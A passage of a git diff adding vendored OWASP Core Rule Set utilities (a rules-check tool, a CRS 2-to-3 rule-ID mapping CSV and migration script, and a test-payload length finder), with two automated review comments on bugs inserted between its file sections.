+ else: + print("%sfile={file}, line={line}, endLine={endLine}, title={title}".format(**msg) % (msg['indent']*" ")) + +def msg(msg): + if oformat == "github": + print("::debug %s" % (msg)) + else: + print(msg) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="CRS Rules Check tool") + parser.add_argument("-o", "--output", dest="output", help="Output format native[default]|github", required=False) + parser.add_argument("-r", "--rules", metavar='/path/to/coreruleset/*.conf', type=str, + nargs='*', help='Directory path to CRS rules', required=True, + action="append") + args = parser.parse_args() + + crspath = [] + for l in args.rules: + crspath += l + + if args.output is not None: + if args.output not in ["native", "github"]: + print("--output can be one of the 'native' or 'github'. Default value is 'native'") + sys.exit(1) + oformat = args.output + + retval = 0 + try: + flist = crspath + flist.sort() + except: + errmsg("Can't open files in given path!") + sys.exit(1) + + if len(flist) == 0: + errmsg("List of files is empty!") + sys.exit(1) + + parsed_structs = {} + txvars = {} + + for f in flist: + try: + with open(f, 'r') as inputfile: + data = inputfile.read() + # modify the content of the file, if it is the "crs-setup.conf.example" + if f.startswith("crs-setup.conf.example"): + data = remove_comments(data) + except: + errmsg("Can't open file: %s" % f) + sys.exit(1) + + ### check file syntax + msg("Config file: %s" % (f)) + try: + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + msg(" Parsing ok.") + parsed_structs[f] = mparser.configlines + except Exception as e: + err = e.args[1] + if err['cause'] == "lexer": + cause = "Lexer" + else: + cause = "Parser" + errmsg("Can't parse config file: %s" % (f)) + errmsgf({ + 'indent' : 2, + 'file' : f, + 'title' : "%s error" % (cause), + 'line' : err['line'], + 'endLine': err['line'], + 'message': "can't parse file"}) + retval = 1 + continue + + msg("Checking parsed rules...") + for 
f in parsed_structs.keys(): + + msg(f) + c = Check(parsed_structs[f], txvars) + + ### check case usings + c.check_ignore_case() + if len(c.caseerror) == 0: + msg(" Ignore case check ok.") + else: + errmsg(" Ignore case check found error(s)") + for a in c.caseerror: + a['indent'] = 2 + a['file'] = f + a['title'] = "Case check" + errmsgf(a) + retval = 1 + + ### check action's order + c.check_action_order() + if len(c.orderacts) == 0: + msg(" Action order check ok.") + else: + errmsg(" Action order check found error(s)") + for a in c.orderacts: + a['indent'] = 2 + a['file'] = f + a['title'] = 'Action order check' + errmsgf(a) + retval = 1 + + ### make a diff to check the indentations + try: + with open(f, 'r') as fp: + fromlines = fp.readlines() + if f.startswith("crs-setup.conf.example"): + fromlines = remove_comments("".join(fromlines)).split("\n") + fromlines = [l + "\n" for l in fromlines] + except: + errmsg(" Can't open file for indent check: %s" % (f)) + retval = 1 + # virtual output + mwriter = msc_pyparser.MSCWriter(parsed_structs[f]) + mwriter.generate() + #mwriter.output.append("") + output = [] + for l in mwriter.output: + if l == "\n": + output.append("\n") + else: + output += [l + "\n" for l in l.split("\n")] + + if len(fromlines) < len(output): + fromlines.append("\n") + elif len(fromlines) > len(output): + output.append("\n") + + diff = difflib.unified_diff(fromlines, output) + if fromlines == output: + msg(" Indentation check ok.") + else: + errmsg(" Indentation check found error(s)") + retval = 1 + for d in diff: + d = d.strip("\n") + r = re.match("^@@ -(\d+),(\d+) \+\d+,\d+ @@$", d) + if r: + line1, line2 = [int(i) for i in r.groups()] + e = { + 'indent' : 2, + 'file' : f, + 'title' : "Indentation error", + 'line' : line1, + 'endLine': line1+line2, + 'message': "an indentation error has found" + } + errmsgf(e) + errmsg(d.strip("\n")) + + ### check `ctl:auditLogParts=+E` right place in chained rules + c.check_ctl_audit_log() + if len(c.auditlogparts) 
== 0: + msg(" no 'ctl:auditLogParts' action found.") + else: + errmsg(" Found 'ctl:auditLogParts' action") + for a in c.auditlogparts: + a['indent'] = 2 + a['file'] = f + a['title'] = "'ctl:auditLogParts' isn't allowed in CRS" + errmsgf(a) + retval = 1 + + ### collect TX variables + # this method collects the TX variables, which set via a + # `setvar` action anywhere + # this method does not check any mandatory clause + c.collect_tx_variable(f) + + ### check duplicate ID's + # c.dupes filled during the tx variable collected + if len(c.dupes) == 0: + msg(" no duplicate id's") + else: + errmsg(" Found duplicated id('s)") + for a in c.dupes: + a['indent'] = 2 + a['file'] = f + a['title'] = "'id' is duplicated" + errmsgf(a) + retval = 1 + + ### check PL consistency + c.check_pl_consistency() + if len(c.pltags) == 0: + msg(" paranoia-level tags are correct.") + else: + errmsg(" Found incorrect paranoia-level/N tag(s)") + for a in c.pltags: + a['indent'] = 2 + a['file'] = f + a['title'] = "wrong or missing paranoia-level/N tag" + errmsgf(a) + retval = 1 + if len(c.plscores) == 0: + msg(" PL anomaly_scores are correct.") + else: + errmsg(" Found incorrect (inbound|outbout)_anomaly_score value(s)") + for a in c.plscores: + a['indent'] = 2 + a['file'] = f + a['title'] = "wrong (inbound|outbout)_anomaly_score variable or value" + errmsgf(a) + retval = 1 + + ### check existence of used TX variables + c.check_tx_variable(f) + if len(c.undef_txvars) == 0: + msg(" All TX variables are set") + else: + errmsg(" There are one or more unset TX variables.") + for a in c.undef_txvars: + a['indent'] = 2 + a['file'] = f + a['title'] = "unset TX variable" + errmsgf(a) + retval = 1 + msg("End of checking parsed rules") + msg("Cumulated report about unused TX variables") + has_unused = False + for tk in txvars: + if txvars[tk]['used'] == False: + if has_unused == False: + msg(" Unused TX variable(s):") + a = txvars[tk] + a['indent'] = 2 + a['title'] = "unused TX variable" + a['message'] = 
"unused variable: %s" % (tk)
+ errmsgf(a)
+ retval = 1
+ has_unused = True
+
+ if has_unused == False:
+ msg(" No unused TX variable")
+
+ sys.exit(retval)
diff --git a/nginx/config/owasp-crs/util/crs2-renumbering/IdNumbering.csv b/nginx/config/owasp-crs/util/crs2-renumbering/IdNumbering.csv
new file mode 100644
index 00000000..269b88af
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs2-renumbering/IdNumbering.csv
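Review bot: `store_error(self, msg)` takes a single message argument, but the "Invalid action" and "Invalid ctl" branches of `check_ignore_case` call it with two positional arguments, so the first unknown action or ctl name the checker meets raises a TypeError instead of being reported; the neighbouring transform check shows the intended form, `self.store_error("Invalid action: %s" % a['act_name'])` and `self.store_error("Invalid ctl: %s" % a['act_arg'])`. The two bare `except:` clauses in the `__main__` block (around the file-list sort and the per-file `open`) also discard the underlying OSError text and swallow KeyboardInterrupt; `except OSError as e:` with `e` included in the errmsg output would keep the tool usable in CI. This file looks like a vendored copy of the upstream OWASP CRS `util/crs-rules-check` tool, so these fixes are best carried upstream, and the CRS version this copy was taken from should be recorded next to it so the vendored tree can be refreshed later.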
@@ -0,0 +1,1132 @@ +200000,000000 +200121,000000 +200273,000000 +200280,000000 +200281,000000 +200287,000000 +200289,000000 +200290,000000 +200299,000000 +200316,000000 +200333,000000 +200337,000000 +200350,000000 +200351,000000 +200366,000000 +200367,000000 +200368,000000 +200369,000000 +200370,000000 +200371,000000 +200372,000000 +200373,000000 +200374,000000 +200375,000000 +200376,000000 +200377,000000 +200378,000000 +200379,000000 +200381,000000 +200382,000000 +200383,000000 +200384,000000 +200385,000000 +200386,000000 +200387,000000 +200388,000000 +200389,000000 +200390,000000 +200391,000000 +200392,000000 +200394,000000 +200395,000000 +200396,000000 +200397,000000 +200398,000000 +200399,000000 +200400,000000 +200401,000000 +200402,000000 +200403,000000 +200404,000000 +200405,000000 +200406,000000 +200407,000000 +200408,000000 +200409,000000 +200410,000000 +200411,000000 +200412,000000 +200413,000000 +200414,000000 +200415,000000 +200416,000000 +200417,000000 +200418,000000 +200419,000000 +200420,000000 +200421,000000 +200422,000000 +200423,000000 +200424,000000 +200425,000000 +200426,000000 +200427,000000 +200428,000000 +200429,000000 +200430,000000 +200431,000000 +200432,000000 +200433,000000 +200434,000000 +200435,000000 +200436,000000 +200437,000000 +200438,000000 +200439,000000 +200440,000000 +200441,000000 +200442,000000 +200443,000000 +200445,000000 +200446,000000 +200447,000000 +200448,000000 +200449,000000 +200450,000000 +200451,000000 +200452,000000 +200453,000000 +200454,000000 +200455,000000 +200456,000000 +200457,000000 +200458,000000 +200459,000000 +200460,000000 +200461,000000 +200462,000000 +200463,000000 +200464,000000 +200465,000000 +200466,000000 +200467,000000 +200468,000000 +200469,000000 +200470,000000 +200471,000000 +200472,000000 +200473,000000 +200474,000000 +200475,000000 +200476,000000 +200477,000000 +200478,000000 +200479,000000 +200480,000000 +200481,000000 +200482,000000 +200483,000000 +200484,000000 +200485,000000 +200486,000000 
+200487,000000 +200488,000000 +200489,000000 +200490,000000 +200491,000000 +200492,000000 +200493,000000 +200494,000000 +200495,000000 +200496,000000 +200497,000000 +200498,000000 +200499,000000 +200500,000000 +200501,000000 +200502,000000 +200503,000000 +200504,000000 +200505,000000 +200506,000000 +200507,000000 +200508,000000 +200509,000000 +200510,000000 +200511,000000 +200512,000000 +200513,000000 +200514,000000 +200515,000000 +200516,000000 +200517,000000 +200518,000000 +200519,000000 +200520,000000 +200521,000000 +200522,000000 +200523,000000 +200524,000000 +200525,000000 +200526,000000 +200527,000000 +200528,000000 +200529,000000 +200530,000000 +200532,000000 +200533,000000 +200534,000000 +200535,000000 +200536,000000 +200537,000000 +200538,000000 +200539,000000 +200540,000000 +200541,000000 +200542,000000 +200543,000000 +200544,000000 +200545,000000 +200546,000000 +200547,000000 +200548,000000 +200549,000000 +200550,000000 +200551,000000 +200552,000000 +200553,000000 +200554,000000 +200555,000000 +200556,000000 +200557,000000 +200558,000000 +200559,000000 +200560,000000 +200561,000000 +200562,000000 +200563,000000 +200564,000000 +200565,000000 +200566,000000 +200567,000000 +200568,000000 +200569,000000 +200570,000000 +200571,000000 +200572,000000 +200573,000000 +200574,000000 +200575,000000 +200576,000000 +200577,000000 +200578,000000 +200579,000000 +200580,000000 +200581,000000 +200582,000000 +200583,000000 +200584,000000 +200585,000000 +200586,000000 +200587,000000 +200588,000000 +200589,000000 +200590,000000 +200591,000000 +200592,000000 +200593,000000 +200594,000000 +200595,000000 +200596,000000 +200597,000000 +200598,000000 +200599,000000 +200600,000000 +200601,000000 +200602,000000 +200603,000000 +200604,000000 +200605,000000 +200606,000000 +200607,000000 +200608,000000 +200609,000000 +200610,000000 +200611,000000 +200612,000000 +200613,000000 +200614,000000 +200615,000000 +200616,000000 +200617,000000 +200618,000000 +200619,000000 +200620,000000 
+200621,000000 +200622,000000 +200623,000000 +200624,000000 +200625,000000 +200626,000000 +200627,000000 +200628,000000 +200629,000000 +200630,000000 +200631,000000 +200632,000000 +200633,000000 +200634,000000 +200635,000000 +200645,000000 +200646,000000 +200647,000000 +200648,000000 +200649,000000 +200650,000000 +200651,000000 +200652,000000 +200653,000000 +200654,000000 +200655,000000 +200656,000000 +200657,000000 +200658,000000 +200659,000000 +200660,000000 +200661,000000 +200662,000000 +200663,000000 +200664,000000 +200665,000000 +200666,000000 +200667,000000 +200668,000000 +200669,000000 +200670,000000 +200671,000000 +200673,000000 +200674,000000 +200675,000000 +200676,000000 +200677,000000 +200678,000000 +200679,000000 +200680,000000 +200681,000000 +200682,000000 +200683,000000 +200684,000000 +200685,000000 +200686,000000 +200687,000000 +200688,000000 +200689,000000 +200690,000000 +200692,000000 +200693,000000 +200694,000000 +200695,000000 +200696,000000 +200697,000000 +200698,000000 +200699,000000 +200700,000000 +200701,000000 +200702,000000 +200703,000000 +200704,000000 +200705,000000 +200706,000000 +200707,000000 +200708,000000 +200709,000000 +200710,000000 +200711,000000 +200712,000000 +200713,000000 +200714,000000 +200718,000000 +200719,000000 +200720,000000 +200721,000000 +200722,000000 +200723,000000 +200724,000000 +200725,000000 +200726,000000 +200727,000000 +200728,000000 +200729,000000 +200730,000000 +200731,000000 +200732,000000 +200733,000000 +200734,000000 +200735,000000 +200736,000000 +200737,000000 +200738,000000 +200739,000000 +200740,000000 +200741,000000 +200742,000000 +200743,000000 +200744,000000 +200745,000000 +200746,000000 +200747,000000 +200748,000000 +200749,000000 +200751,000000 +200752,000000 +200753,000000 +200754,000000 +200755,000000 +200756,000000 +200789,000000 +200865,000000 +200868,000000 +200872,000000 +200882,000000 +200883,000000 +200884,000000 +200885,000000 +200887,000000 +200888,000000 +200889,000000 +200890,000000 
+200892,000000 +200893,000000 +200896,000000 +200897,000000 +200899,000000 +200901,000000 +200905,000000 +200906,000000 +200907,000000 +200908,000000 +200910,000000 +200912,000000 +200914,000000 +200916,000000 +200917,000000 +200918,000000 +200919,000000 +200922,000000 +200923,000000 +200930,000000 +200931,000000 +200932,000000 +200933,000000 +200936,000000 +200937,000000 +200938,000000 +200939,000000 +200941,000000 +200942,000000 +200943,000000 +200945,000000 +200946,000000 +200950,000000 +200959,000000 +200964,000000 +200965,000000 +200966,000000 +200967,000000 +200969,000000 +200971,000000 +200972,000000 +200973,000000 +200974,000000 +200975,000000 +200976,000000 +200978,000000 +200979,000000 +200983,000000 +200984,000000 +200987,000000 +200988,000000 +200989,000000 +200990,000000 +200991,000000 +200992,000000 +200993,000000 +200994,000000 +200995,000000 +200996,000000 +200997,000000 +200999,000000 +201001,000000 +201002,000000 +201003,000000 +201004,000000 +201007,000000 +201008,000000 +201009,000000 +201012,000000 +201013,000000 +201014,000000 +201016,000000 +201017,000000 +201018,000000 +201019,000000 +201020,000000 +201022,000000 +201025,000000 +201026,000000 +201027,000000 +201034,000000 +201035,000000 +201036,000000 +201046,000000 +201047,000000 +201048,000000 +201055,000000 +201056,000000 +201061,000000 +201062,000000 +201063,000000 +201064,000000 +201065,000000 +201066,000000 +201070,000000 +201071,000000 +201072,000000 +201075,000000 +201077,000000 +201078,000000 +201080,000000 +201083,000000 +201084,000000 +201085,000000 +201086,000000 +201092,000000 +201094,000000 +201095,000000 +201097,000000 +201098,000000 +201099,000000 +201100,000000 +201101,000000 +201102,000000 +201104,000000 +201105,000000 +201106,000000 +201107,000000 +201108,000000 +201109,000000 +201110,000000 +201111,000000 +201113,000000 +201114,000000 +201115,000000 +201116,000000 +201117,000000 +201119,000000 +201120,000000 +201121,000000 +201125,000000 +201126,000000 +201127,000000 
+201137,000000 +201138,000000 +201142,000000 +201145,000000 +201155,000000 +201156,000000 +201157,000000 +201166,000000 +201167,000000 +201172,000000 +201173,000000 +201182,000000 +201183,000000 +201184,000000 +201185,000000 +201187,000000 +201188,000000 +201192,000000 +201193,000000 +201194,000000 +201195,000000 +201200,000000 +201201,000000 +201202,000000 +201203,000000 +201204,000000 +201206,000000 +201207,000000 +201209,000000 +201212,000000 +201213,000000 +201216,000000 +201218,000000 +201219,000000 +201221,000000 +201222,000000 +201233,000000 +201234,000000 +201235,000000 +201236,000000 +201237,000000 +201238,000000 +201239,000000 +201240,000000 +201241,000000 +201242,000000 +201243,000000 +201247,000000 +201248,000000 +201249,000000 +201256,000000 +201257,000000 +201258,000000 +201260,000000 +201265,000000 +201266,000000 +201267,000000 +201268,000000 +201269,000000 +201270,000000 +201271,000000 +201272,000000 +201274,000000 +201275,000000 +201279,000000 +201282,000000 +201283,000000 +201287,000000 +201288,000000 +201294,000000 +201295,000000 +201299,000000 +201308,000000 +201309,000000 +201310,000000 +201311,000000 +201312,000000 +201313,000000 +201315,000000 +201322,000000 +201323,000000 +201330,000000 +201331,000000 +201342,000000 +201343,000000 +201346,000000 +201347,000000 +900001,000000 +900002,000000 +900003,000000 +900004,000000 +900005,000000 +900006,000000 +900007,000000 +900008,000000 +900009,000000 +900010,000000 +900011,000000 +900012,000000 +900013,000000 +900014,000000 +900015,000000 +900016,000000 +900017,000000 +900018,000000 +900019,000000 +900020,000000 +900021,000000 +900030,000000 +900031,000000 +900032,000000 +900033,000000 +900034,000000 +900035,000000 +900036,000000 +900037,000000 +900038,000000 +900039,000000 +900040,000000 +900041,000000 +900042,000000 +900043,000000 +900044,000000 +900045,000000 +900046,000000 +900047,000000 +900048,000000 +900050,910100 +900051,910110 +900051,910120 +910006,000000 +910007,000000 +910008,000000 
+920005,000000 +920006,000000 +920007,000000 +920008,000000 +920009,000000 +920010,000000 +920011,000000 +920012,000000 +920013,000000 +920014,000000 +920015,000000 +920016,000000 +920017,000000 +920018,000000 +920019,000000 +920020,000000 +920021,000000 +920022,000000 +920023,000000 +950000,943120 +950001,942150 +950002,000000 +950003,943110 +950005,930120 +950006,000000 +950007,000000 +950008,000000 +950009,943100 +950010,000000 +950011,000000 +950012,921100 +950018,000000 +950019,000000 +950020,000000 +950103,930100 +950104,930110 +950107,920220 +950108,920240 +950109,920230 +950110,000000 +950115,000000 +950116,920260 +950117,931100 +950118,931110 +950119,931120 +950120,931130 +950801,920250 +950901,942130 +950907,932100 +950908,000000 +950910,921120 +950911,921130 +950912,921140 +950913,921150 +950914,921160 +950915,921110 +950921,000000 +950922,000000 +950923,000000 +958000,000000 +958001,000000 +958002,000000 +958003,000000 +958004,000000 +958005,000000 +958006,000000 +958007,000000 +958008,000000 +958009,000000 +958010,000000 +958011,000000 +958012,000000 +958013,000000 +958016,000000 +958017,000000 +958018,000000 +958019,000000 +958020,000000 +958022,000000 +958023,000000 +958024,000000 +958025,000000 +958026,000000 +958027,000000 +958028,000000 +958030,000000 +958031,000000 +958032,000000 +958033,000000 +958034,000000 +958036,000000 +958037,000000 +958038,000000 +958039,000000 +958040,000000 +958041,000000 +958045,000000 +958046,000000 +958047,000000 +958049,000000 +958051,000000 +958052,000000 +958054,000000 +958056,000000 +958057,000000 +958059,000000 +958230,920190 +958231,920200 +958291,000000 +958295,920210 +958297,000000 +958404,000000 +958405,000000 +958406,000000 +958407,000000 +958408,000000 +958409,000000 +958410,000000 +958411,000000 +958412,000000 +958413,000000 +958414,000000 +958415,000000 +958416,000000 +958417,000000 +958418,000000 +958419,000000 +958420,000000 +958421,000000 +958422,000000 +958423,000000 +958976,000000 +958977,933110 
+958978,933000 +958979,933120 +958980,933130 +959070,942380 +959071,942390 +959072,942400 +959073,942410 +959151,933100 +960000,920120 +960001,000000 +960002,000000 +960003,000000 +960006,920330 +960007,920290 +960008,920280 +960009,920320 +960010,920420 +960011,920170 +960012,920180 +960014,000000 +960015,920300 +960016,920160 +960017,920350 +960018,000000 +960020,000000 +960021,920310 +960022,000000 +960024,942460 +960032,911100 +960034,920430 +960035,920440 +960038,920450 +960208,920370 +960209,920360 +960335,920380 +960341,920390 +960342,920400 +960343,920410 +960901,920270 +960902,000000 +960904,920340 +960911,920100 +960912,920130 +960913,000000 +960914,920140 +960915,920150 +970003,951100 +970004,954120 +970007,000000 +970008,000000 +970009,953100 +970010,000000 +970011,000000 +970012,000000 +970013,950130 +970014,952100 +970015,953110 +970016,000000 +970017,952110 +970017,954100 +970018,000000 +970021,000000 +970118,954110 +970901,950100 +970902,953120 +970903,000000 +970904,954130 +973300,941320 +973301,000000 +973302,000000 +973303,000000 +973304,000000 +973305,000000 +973306,000000 +973307,000000 +973308,000000 +973309,000000 +973310,000000 +973311,000000 +973312,000000 +973313,000000 +973314,000000 +973315,941190 +973316,000000 +973317,941300 +973318,941290 +973319,941310 +973320,941280 +973321,941270 +973322,941250 +973323,941240 +973324,941230 +973325,000000 +973326,941200 +973327,000000 +973328,000000 +973329,000000 +973330,000000 +973331,000000 +973332,941330 +973333,941340 +973334,000000 +973335,000000 +973336,941110 +973337,941120 +973338,941140 +973339,941130 +973340,941160 +973341,941170 +973342,941180 +973343,941100 +973344,941100 +973345,941220 +973346,941210 +973347,000000 +973348,941260 +973350,941150 +981000,000000 +981001,000000 +981003,000000 +981004,000000 +981005,000000 +981006,000000 +981007,000000 +981018,000000 +981020,901100 +981021,901110 +981022,000000 +981033,000000 +981034,000000 +981035,000000 +981036,000000 +981037,000000 
+981038,000000 +981039,000000 +981040,000000 +981041,000000 +981042,000000 +981043,000000 +981044,912120 +981045,912130 +981046,912140 +981047,912150 +981048,912160 +981049,912170 +981050,000000 +981051,000000 +981052,000000 +981053,000000 +981054,000000 +981055,000000 +981056,000000 +981057,000000 +981058,000000 +981059,000000 +981060,000000 +981061,000000 +981062,000000 +981063,000000 +981064,000000 +981075,000000 +981076,000000 +981077,000000 +981078,000000 +981079,000000 +981080,000000 +981081,000000 +981082,000000 +981083,000000 +981084,000000 +981085,000000 +981086,000000 +981087,000000 +981088,000000 +981089,000000 +981090,000000 +981091,000000 +981092,000000 +981093,000000 +981094,000000 +981095,000000 +981096,000000 +981097,000000 +981098,000000 +981099,000000 +981100,000000 +981101,000000 +981102,000000 +981103,000000 +981104,000000 +981105,000000 +981110,000000 +981131,000000 +981132,000000 +981133,000000 +981134,000000 +981136,000000 +981137,000000 +981138,910140 +981139,910190 +981140,910000 +981141,910150 +981142,910160 +981143,910170 +981144,910180 +981145,000000 +981172,942420 +981173,942430 +981175,949100 +981176,949190 +981177,000000 +981178,000000 +981179,949110 +981180,949120 +981181,949130 +981182,949140 +981183,949150 +981184,949160 +981185,000000 +981186,949170 +981187,949180 +981188,000000 +981189,000000 +981190,000000 +981191,000000 +981192,000000 +981193,000000 +981194,000000 +981195,000000 +981196,000000 +981197,000000 +981198,000000 +981199,000000 +981200,959100 +981201,980100 +981202,980110 +981203,980120 +981204,980130 +981205,980140 +981219,000000 +981220,000000 +981221,000000 +981222,000000 +981223,000000 +981224,000000 +981227,920110 +981228,000000 +981229,000000 +981230,000000 +981231,942440 +981235,000000 +981236,000000 +981237,000000 +981238,000000 +981239,000000 +981240,942300 +981241,942230 +981242,942330 +981243,942370 +981244,942180 +981245,942260 +981246,942340 +981247,942360 +981248,942210 +981249,942310 +981250,942170 
+981251,942350 +981252,942240 +981253,942320 +981254,942280 +981255,942190 +981256,942250 +981257,942200 +981260,942450 +981261,942100 +981270,942290 +981272,942160 +981276,942270 +981277,942220 +981300,000000 +981301,000000 +981302,000000 +981303,000000 +981304,000000 +981305,000000 +981306,000000 +981307,000000 +981308,000000 +981309,000000 +981310,000000 +981311,000000 +981312,000000 +981313,000000 +981314,000000 +981315,000000 +981316,000000 +981317,000000 +981318,942110 +981319,942120 +981320,942140 +981400,000000 +981401,000000 +981402,000000 +981403,000000 +981404,000000 +981405,000000 +981406,000000 +981407,000000 +990002,913100 +990012,000000 +990901,913110 +990902,913120 +999003,000000 +999004,000000 +999005,000000 +999006,000000 +999008,000000 +999010,000000 +999011,000000 +9700010,951110 +9700011,951120 +9700012,951130 +9700013,951140 +9700014,951150 +9700015,951160 +9700016,951170 +9700017,951180 +9700018,951190 +9700019,951200 +9700020,951210 +9700021,951220 +9700022,951230 +9700023,951240 +9700024,951250 +9700025,951260 diff --git a/nginx/config/owasp-crs/util/crs2-renumbering/README b/nginx/config/owasp-crs/util/crs2-renumbering/README new file mode 100644 index 00000000..fd1861dd --- /dev/null +++ b/nginx/config/owasp-crs/util/crs2-renumbering/README 
@@ -0,0 +1,30 @@
+CRS 2.x to 3.x migration utility
+================================
+
+In CRS 3.0, we have renumbered the rules to be more logical and helpful.
+The new rule file names now correspond with the rule IDs in the file.
+First rule of a given file is usually 9XX100, then the rules continue
+in steps of ten. Related rules/siblings follow with a single digit
+change (9XX101, etc.).
+
+This utility replaces CRS 2 ruleIds with their CRS 3 counterparts.
+You can use it when migrating your CRS 2 exclusion/.conf files to CRS 3.0
+or higher.
+
+Example usage:
+
+ ./update.py -f your_old_modsec_conf.conf
+
+Rules which have been removed in CRS 3 are listed with the new ID 000000 in the
+CSV file. This means that the former rule is no longer part of CRS 3. If after
+replacement you find a string 000000 in your config files, you can likely
+remove that exclusion or special case.
+
+If you want to create your own tooling for this migration, you can use
+the file idNumbering.csv in this directory. It lists the old rule IDs of
+CRS 2.2, together with the corresponding rule IDs in CRS 3.0.
+
+A rule renumbering is painful for all existing installations. But we really
+think that the rule IDs lacked sense and reason, and we are confident future
+maintenance will be much easier once this is done. We do not plan to change
+rule IDs after this. We appreciate your understanding in this matter.
diff --git a/nginx/config/owasp-crs/util/crs2-renumbering/update.py b/nginx/config/owasp-crs/util/crs2-renumbering/update.py
new file mode 100755
index 00000000..42ea75b9
--- /dev/null
+++ b/nginx/config/owasp-crs/util/crs2-renumbering/update.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""This is designed to convert 2.x CRS ID numbering to 3.x CRS numbering"""
+from __future__ import print_function
+import csv
+import argparse
+import os
+import sys
+
+def main():
+ """Main function that contains all the logic to relabel CRS IDs"""
+
+ id_translation_file = os.path.join(sys.path[0], "IdNumbering.csv")
+
+ if not os.path.isfile(id_translation_file):
+ sys.stderr.write("We were unable to locate the ID translation CSV (idNumbering.csv) \
+ please place this is the same directory as this script\n")
+ sys.exit(1)
+
+ parser = argparse.ArgumentParser(description="A program that takes in an exceptions file \
+ and renumbers all the ID to match OWASP CRS 3 numbers. Output will be directed to STDOUT.")
+ parser.add_argument("-f", "--file", required=True, action="store", dest="fname", \
+ help="the file to be renumbered")
+ args = parser.parse_args()
+
+ if not os.path.isfile((args.fname).encode('utf8')):
+ sys.stderr.write("We were unable to find the file you were trying to update the ID numbers \
+ in, please check your path\n")
+ sys.exit(1)
+
+ fcontent = ""
+
+ try:
+ update_file = open((args.fname).encode('utf-8'), "r")
+ try:
+ fcontent = update_file.read()
+ finally:
+ update_file.close()
+ except IOError:
+ sys.stderr.write("There was an error opening the file you were trying to update")
+
+ if fcontent != "":
+ # CSV File
+ id_csv_file = open(id_translation_file, 'rt')
+ try:
+ reader = csv.reader(id_csv_file)
+ for row in reader:
+ fcontent = fcontent.replace(row[0], row[1])
+ finally:
+ id_csv_file.close()
+ print(fcontent)
+
+if __name__ == "__main__":
+ main()
diff --git a/nginx/config/owasp-crs/util/find-max-datalen-in-tests/README.md b/nginx/config/owasp-crs/util/find-max-datalen-in-tests/README.md
new file mode 100644
index 00000000..8f2dcd8b
--- /dev/null
+++ b/nginx/config/owasp-crs/util/find-max-datalen-in-tests/README.md
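Review bot: `fcontent = fcontent.replace(row[0], row[1])` in the CSV loop is an unanchored substring replacement applied one row at a time, so an old ID that happens to occur inside a longer number or token in the config is rewritten as well, and the new ID written by one row can itself be matched by a later row's old ID (the CSV mixes 6-digit and 7-digit old IDs such as `9700010`, which makes substring hits plausible). Loading the CSV into a dict and doing a single anchored pass avoids both problems: `mapping = {row[0]: row[1] for row in reader}` followed by `fcontent = re.sub(r'\b(\d{6,7})\b', lambda m: mapping.get(m.group(1), m.group(1)), fcontent)` (needs `import re`). Separately, the `except IOError:` branch only writes a message and falls through, so an unreadable input file ends with an empty STDOUT and exit status 0; add `sys.exit(1)` there. The error text and the README say `idNumbering.csv` while the code opens `IdNumbering.csv`, which matters on case-sensitive filesystems, so the message should name the file the code actually looks for.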
@@ -0,0 +1,47 @@ +# Find the longest data in CRS test cases + +This page describes how can you find the longest data string in CRS test cases. + +## Goals + +Some rules check the `FILES_COMBINED_SIZE` against the `TX:COMBINED_FILE_SIZES` variable. To check these work as well, we need to set the `tx.combined_file_sizes` variable and send a payload which is greater than this value - see [this](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/tests/regression/README.md#requirements): + +``` +SecAction "id:900005,\ + phase:1,\ + nolog,\ + pass,\ + ctl:ruleEngine=DetectionOnly,\ + ctl:ruleRemoveById=910000,\ + setvar:tx.blocking_paranoia_level=4,\ + setvar:tx.crs_validate_utf8_encoding=1,\ + setvar:tx.arg_name_length=100,\ + setvar:tx.arg_length=400,\ + setvar:tx.combined_file_sizes=MAX_LEN" +``` + +In `modsecurity-crs-docker` [here](https://github.com/coreruleset/modsecurity-crs-docker/blob/master/src/opt/modsecurity/activate-rules.sh#L79-L82) is how the setting works. + +To configure the Github action, you need to set up this in CORERULESET/test/docker-compose.yaml: + +``` + ... + COMBINED_FILE_SIZES=MAX_LEN + ... +``` + +## Usage + +To find the possible value of MAX_LEN, run this script with one mandatory, and one optional argument. The mandatory argument is the path of the CRS directory (the root). The optional argument is the `-i` or `--ignoretests`, where you can pass the test id what you want to skip - eg. you want to use the test to exceed the maximum length. + +``` +./find_max_datalen.py ../.. -i 920410-1 +``` + +In this case, you pass the CRS root as parent dir, and skip the test id 920410-1, which wants to exceed the maximum length. + +## Prerequisites + +* Python3 interpreter +* Py-YAML +* CRS rule set diff --git a/nginx/config/owasp-crs/util/find-max-datalen-in-tests/find_max_datalen.py b/nginx/config/owasp-crs/util/find-max-datalen-in-tests/find_max_datalen.py new file mode 100755 index 00000000..aab66ac7 --- /dev/null 
+++ b/nginx/config/owasp-crs/util/find-max-datalen-in-tests/find_max_datalen.py 
@@ -0,0 +1,69 @@ +#!/usr/bin/env python3 + +# This file helps to find the longest data size in all test cases under +# CORERULESET_ROOT/test/regression/tests directory. + +# You just have to pass the CORERULESET_ROOT as argument. +# Optional argument can be passed -i or --ignoretests - the listed test +# cases will skipped. + +# At the end, the script will print the longest length, and the rule where +# the data is. + + +import sys +import os +import os.path +import yaml +import argparse + +if __name__ == "__main__": + + desc = """This script needs a mandatory argument where you pass the path to your +coreruleset. Then it iterates through tests, and finds the longest request +body (data) between test cases. To ignore a test case, pass the number of the +test with '-i' or '--ignoretests', eg.: '... -i 920410-1'""" + + parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument('-i', '--ignoretests', metavar='ignoretests', + help='Ignore listed rules, separated by comma', required=False, + nargs=1) + parser.add_argument('crspath', metavar='/path/to/coreruleset', type=str, + help='Directory path to CRS') + args = parser.parse_args() + + test_cases = {} + testpath = args.crspath.rstrip("/") + "/tests/regression/tests" + + if not os.path.isdir(testpath): + print("Directory does not exist: %s" % (testpath)) + sys.exit(1) + + ignoretests = [] + if args.ignoretests is not None: + ignoretests = args.ignoretests[0].split(",") + + try: + max_len = 0 + max_title = "" + for root, dirs, files in os.walk(testpath): + path = root.split(os.sep) + for file in files: + if file.endswith(".yaml"): + with open(os.path.join(root, file)) as f: + test = yaml.full_load(f) + for t in test['tests']: + title = t['test_title'] + for s in t['stages']: + if 'stage' in s: + if 'input' in s['stage']: + if 'data' in s['stage']['input']: + if len(s['stage']['input']['data']) > max_len \ + and title not in 